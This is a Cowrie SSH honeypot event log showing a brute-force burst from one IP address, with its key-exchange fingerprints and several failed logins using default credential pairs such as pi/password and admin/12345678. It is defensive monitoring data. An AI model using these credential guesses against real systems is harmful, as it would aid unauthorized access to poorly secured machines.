{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.855500Z","src_ip":"87.120.191.13","session":"2e23aeb1a9ae"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.859124Z","src_ip":"87.120.191.13","session":"980268adc3ee"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.859588Z","src_ip":"87.120.191.13","session":"980268adc3ee"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.870496Z","src_ip":"87.120.191.13","session":"6c606bd706e5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.871406Z","src_ip":"87.120.191.13","session":"6c606bd706e5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.875206Z","src_ip":"87.120.191.13","session":"d610aa1476df"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.875951Z","src_ip":"87.120.191.13","session":"d610aa1476df"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.877713Z","src_ip":"87.120.191.13","session":"fc33cd9f0e18"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.878097Z","src_ip":"87.120.191.13","session":"fc33cd9f0e18"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.063773Z","src_ip":"87.120.191.13","session":"6c606bd706e5"}
{"eventid":"cowrie.login.failed","username":"pi","password":"password","message":"login attempt [pi/password] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.090798Z","src_ip":"87.120.191.13","session":"fc33cd9f0e18"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.091657Z","src_ip":"87.120.191.13","session":"2e23aeb1a9ae"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"password","message":"login attempt [ubnt/password] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.098099Z","src_ip":"87.120.191.13","session":"d610aa1476df"}
{"eventid":"cowrie.login.failed","username":"noc","password":"password","message":"login attempt [noc/password] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.104877Z","src_ip":"87.120.191.13","session":"980268adc3ee"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.231601Z","src_ip":"87.120.191.13","session":"d699d8ed0625"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35570,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a657ec83eb4","protocol":"ssh","message":"New connection: 87.120.191.13:35570 (1.2.3.4:22) [session: 5a657ec83eb4]","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.264949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.311068Z","src_ip":"87.120.191.13","session":"5a657ec83eb4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.311768Z","src_ip":"87.120.191.13","session":"5a657ec83eb4"}
{"eventid":"cowrie.login.failed","username":"student","password":"password","message":"login attempt [student/password] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.587484Z","src_ip":"87.120.191.13","session":"5a657ec83eb4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.631083Z","src_ip":"87.120.191.13","session":"44957d519d4e"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35586,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd28c39a6d75","protocol":"ssh","message":"New connection: 87.120.191.13:35586 (1.2.3.4:22) [session: bd28c39a6d75]","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.656417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.743114Z","src_ip":"87.120.191.13","session":"bd28c39a6d75"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:41.743868Z","src_ip":"87.120.191.13","session":"bd28c39a6d75"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.117617Z","src_ip":"87.120.191.13","session":"bd28c39a6d75"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.147602Z","src_ip":"87.120.191.13","session":"6c606bd706e5"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.176470Z","src_ip":"87.120.191.13","session":"fc33cd9f0e18"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.185937Z","src_ip":"87.120.191.13","session":"2e23aeb1a9ae"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35596,"dst_ip":"1.2.3.4","dst_port":22,"session":"d91570ca29a8","protocol":"ssh","message":"New connection: 87.120.191.13:35596 (1.2.3.4:22) [session: d91570ca29a8]","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.193743Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.211363Z","src_ip":"87.120.191.13","session":"980268adc3ee"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35608,"dst_ip":"1.2.3.4","dst_port":22,"session":"0efc7fd59f5e","protocol":"ssh","message":"New connection: 87.120.191.13:35608 (1.2.3.4:22) [session: 0efc7fd59f5e]","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.215088Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.216234Z","src_ip":"87.120.191.13","session":"d610aa1476df"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35612,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d067370b5a6","protocol":"ssh","message":"New connection: 87.120.191.13:35612 (1.2.3.4:22) [session: 5d067370b5a6]","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.218435Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35618,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6a4e078d28b","protocol":"ssh","message":"New connection: 87.120.191.13:35618 (1.2.3.4:22) [session: f6a4e078d28b]","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.233200Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35622,"dst_ip":"1.2.3.4","dst_port":22,"session":"1317d1c82f1b","protocol":"ssh","message":"New connection: 87.120.191.13:35622 (1.2.3.4:22) [session: 1317d1c82f1b]","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.240646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.285836Z","src_ip":"87.120.191.13","session":"0efc7fd59f5e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.286960Z","src_ip":"87.120.191.13","session":"0efc7fd59f5e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.292429Z","src_ip":"87.120.191.13","session":"d91570ca29a8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.293007Z","src_ip":"87.120.191.13","session":"d91570ca29a8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.302115Z","src_ip":"87.120.191.13","session":"5d067370b5a6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.302856Z","src_ip":"87.120.191.13","session":"5d067370b5a6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.304383Z","src_ip":"87.120.191.13","session":"1317d1c82f1b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.304983Z","src_ip":"87.120.191.13","session":"1317d1c82f1b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.326150Z","src_ip":"87.120.191.13","session":"f6a4e078d28b"}
